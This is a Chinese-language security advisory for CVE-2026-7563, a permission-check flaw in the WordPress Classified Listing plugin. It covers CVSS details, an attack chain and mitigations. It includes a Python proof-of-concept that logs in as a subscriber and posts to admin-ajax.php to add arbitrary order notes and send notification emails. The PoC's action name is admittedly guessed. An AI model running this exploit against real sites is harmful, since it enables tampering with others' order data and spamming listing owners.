CVE-2026-7563 CVSS 4.3 中危

CVE-2026-7563 WordPress Classified Listing插件权限绕过漏洞

披露日期: 2026-05-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7563

漏洞类型

权限不当

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Classified Listing – AI-Powered Classified ads & Business Directory Plugin

漏洞概述

WordPress的Classified Listing插件在5.3.10及之前版本存在权限不当漏洞。该插件未能正确验证用户执行特定操作的权限，导致拥有订阅者及以上权限的经过身份验证的攻击者，可以在未经管理员授权的情况下，向任意订单添加任意备注。此外，攻击者还能利用此漏洞触发未经请求的通知和审核邮件，向列表所有者发送垃圾邮件，造成信息滥用。

技术细节

该漏洞核心在于插件后端的权限控制逻辑缺失。具体而言，在处理用户提交的订单备注或管理请求时，相关控制器（如ListingAdminAjax.php和Comments.php中的钩子函数）未对当前用户角色进行严格校验。根据代码引用，插件在ScriptLoader.php和Comments.php中注册了相关处理动作，但在执行写入数据库或触发邮件操作前，未调用`current_user_can`等函数验证用户是否具备管理订单的权限。攻击者只需拥有一个有效的WordPress账户（最低为订阅者级别），即可利用此漏洞。通过向存在漏洞的端点发送包含目标订单ID和恶意备注内容的请求，攻击者能绕过前端限制，直接修改订单数据。这不仅破坏了数据的完整性，还利用系统自动通知机制，向列表所有者发送包含攻击者指定内容的审核或通知邮件，造成垃圾邮件骚扰或社会工程学攻击风险。

攻击链分析

STEP 1

侦察

攻击者识别目标网站是否安装了受影响版本的Classified Listing插件。

STEP 2

获取权限

攻击者在目标WordPress站点注册一个低权限账户（如订阅者Subscriber），或使用已有的低权限账户登录。

STEP 3

漏洞利用

攻击者使用登录凭证，向存在漏洞的AJAX端点发送特制的POST请求，包含目标订单ID和恶意备注内容，绕过权限检查。

STEP 4

达成效果

系统处理请求，将备注添加至订单，并向列表所有者发送未经授权的通知邮件，造成骚扰或误导。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://example.com/wp-admin/admin-ajax.php"
username = "subscriber"
password = "password"

# 1. Authenticate to obtain a valid cookie/session
session = requests.Session()
login_payload = {
    "log": username,
    "pwd": password,
    "redirect_to": "",
    "wp-submit": "Log In",
    "testcookie": "1"
}
session.post("http://example.com/wp-login.php", data=login_payload)

# 2. Exploit: Add arbitrary note to an order
# Note: The action name might vary based on the plugin's actual implementation.
# This example assumes a common AJAX structure.
exploit_payload = {
    "action": "rtcl_ajax_add_order_note", 
    "order_id": "123",                       
    "note_content": "Arbitrary note content injected by attacker.",
    "notify_customer": "true"                
}

response = session.post(target_url, data=exploit_payload)

if response.status_code == 200:
    print("[+] Potential exploit successful. Check target for note/email.")
    print("Response:", response.text)
else:
    print("[-] Exploit failed. Status code:", response.status_code)

影响范围

Classified Listing – AI-Powered Classified ads & Business Directory Plugin <= 5.3.10

防御指南

临时缓解措施

如果无法立即升级插件，建议暂时禁用该插件以阻断攻击链。或者，通过服务器端规则限制对`/wp-admin/admin-ajax.php`的访问，仅允许受信任的IP或特定角色调用相关敏感功能，直到补丁应用完毕。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表